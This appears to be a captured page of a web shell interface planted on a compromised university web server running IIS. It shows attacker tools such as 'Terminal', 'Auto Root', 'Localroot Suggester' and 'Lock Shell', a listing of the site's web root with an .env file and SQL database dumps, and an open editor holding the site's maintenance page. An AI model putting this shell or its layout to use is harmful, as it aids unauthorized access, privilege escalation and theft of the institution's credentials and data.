Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.148.221.222
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
wwwroot /
moocs-fti.unsap.ac.id /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2025-03-19 01:49
app
[ DIR ]
drwxrwxrwx
2025-03-19 00:25
bootstrap
[ DIR ]
drwxrwxrwx
2025-03-19 01:35
cgi-bin
[ DIR ]
drwxrwxrwx
2024-04-05 14:53
config
[ DIR ]
drwxrwxrwx
2025-03-19 00:25
database
[ DIR ]
drwxrwxrwx
2025-04-20 21:12
public
[ DIR ]
dr-xr-xr-x
2025-03-19 04:16
resources
[ DIR ]
dr-xr-xr-x
2025-03-19 00:25
routes
[ DIR ]
drwxrwxrwx
2025-03-19 00:25
solved
[ DIR ]
drwxrwxrwx
2025-03-19 01:47
storage
[ DIR ]
dr-xr-xr-x
2025-03-19 00:25
tests
[ DIR ]
drwxrwxrwx
2025-03-19 00:25
vendor
[ DIR ]
drwxrwxrwx
2025-04-20 21:00
.editorconfig
276
B
-rw-rw-rw-
2022-10-07 17:09
.env
2.53
KB
-rw-rw-rw-
2025-03-19 02:24
.env.example
2.04
KB
-rw-rw-rw-
2022-12-24 20:27
.gitattributes
175
B
-rw-rw-rw-
2024-12-04 22:39
.gitignore
316
B
-rw-rw-rw-
2025-03-10 13:36
.htaccess
204
B
-rw-rw-rw-
2024-12-16 00:06
.styleci.yml
188
B
-rw-rw-rw-
2022-10-07 17:09
README.md
3.94
KB
-rw-rw-rw-
2024-10-26 23:11
___htaccess
787
B
-rw-rw-rw-
2024-12-16 00:08
__phpinfo.php
25
B
-rw-rw-rw-
2024-04-06 02:20
_index.php
25
B
-rw-rw-rw-
2024-04-06 02:19
artisan
1.7
KB
-rw-rw-rw-
2022-10-07 17:09
composer.json
3.4
KB
-rw-rw-rw-
2024-12-04 16:26
composer.lock
514.45
KB
-rw-rw-rw-
2024-12-04 16:26
help.md
113
B
-rw-rw-rw-
2023-09-08 19:28
maintenance.html
2.17
KB
-rw-rw-rw-
2024-09-02 23:50
package.json
845
B
-rw-rw-rw-
2022-10-07 17:09
phpunit.xml
1.18
KB
-rw-rw-rw-
2022-10-07 17:09
server.php
584
B
-rw-rw-rw-
2022-10-07 17:09
u8620162_mooc_fti.sql
412.92
KB
-rw-rw-rw-
2024-10-26 23:15
u8620162_mooc_fti.zip
79.35
KB
-rw-rw-rw-
2024-11-13 00:24
web.config
3.16
KB
-rw-rw-rw-
2025-03-11 22:51
webpack.mix.js
565
B
-rw-rw-rw-
2022-10-07 17:09
Save
Rename
<?php $protocol = isset( $_SERVER['SERVER_PROTOCOL'] ) ? $_SERVER['SERVER_PROTOCOL'] : ''; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0' ), true ) ) { $protocol = 'HTTP/1.0'; } header( "$protocol 503 Service Unavailable", true, 503 ); header( 'Content-Type: text/html; charset=utf-8' ); header( 'Retry-After: 30' ); ?> <!doctype html> <html lang="en"> <head> <title>Site Maintenance</title> <meta charset="utf-8"> <meta name="robots" content="noindex"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> body { text-align: center; padding: 20px; font: 20px Helvetica, sans-serif; color: #efe8e8; background-color:#2e2929} @media (min-width: 768px){ body{ padding-top: 150px; } } h1 { font-size: 50px; } article { display: block; text-align: left; max-width: 650px; margin: 0 auto; } a { color: #dc8100; text-decoration: none; } a:hover { color: #efe8e8; text-decoration: none; } </style> </head> <body> <article> <h1>We’ll be back soon!</h1> <div> <p>Sorry for the inconvenience but we’re performing some maintenance at the moment. If you need to you can always <a href="mailto:#">contact us</a>, otherwise we’ll be back online shortly!</p> <p>— SISINFO TEAM</p> </div> <div style="display: flex; flex-direction: row; justify-content: space-between;"> <p class="day"></p> <p class="hour"></p> <p class="minute"></p> <p class="second"></p> </div> </article> <script> const countDown = () => { const countDay = new Date('Juli 12, 2024 00:00:00'); const now = new Date(); const counter = countDay - now; const second = 1000; const minute = second * 60; const hour = minute * 60; const day = hour * 24; const textDay = Math.floor(counter / day); const textHour = Math.floor((counter % day) / hour); const textMinute = Math.floor((counter % hour) / minute); const textSecond = Math.floor((counter % minute) / second) document.querySelector(".day").innerText = textDay + ' Days'; document.querySelector(".hour").innerText = textHour + ' Hours'; document.querySelector(".minute").innerText = textMinute + ' Minutes'; document.querySelector(".second").innerText = textSecond + ' Seconds'; } countDown(); setInterval(countDown, 1000); </script> </body> </html>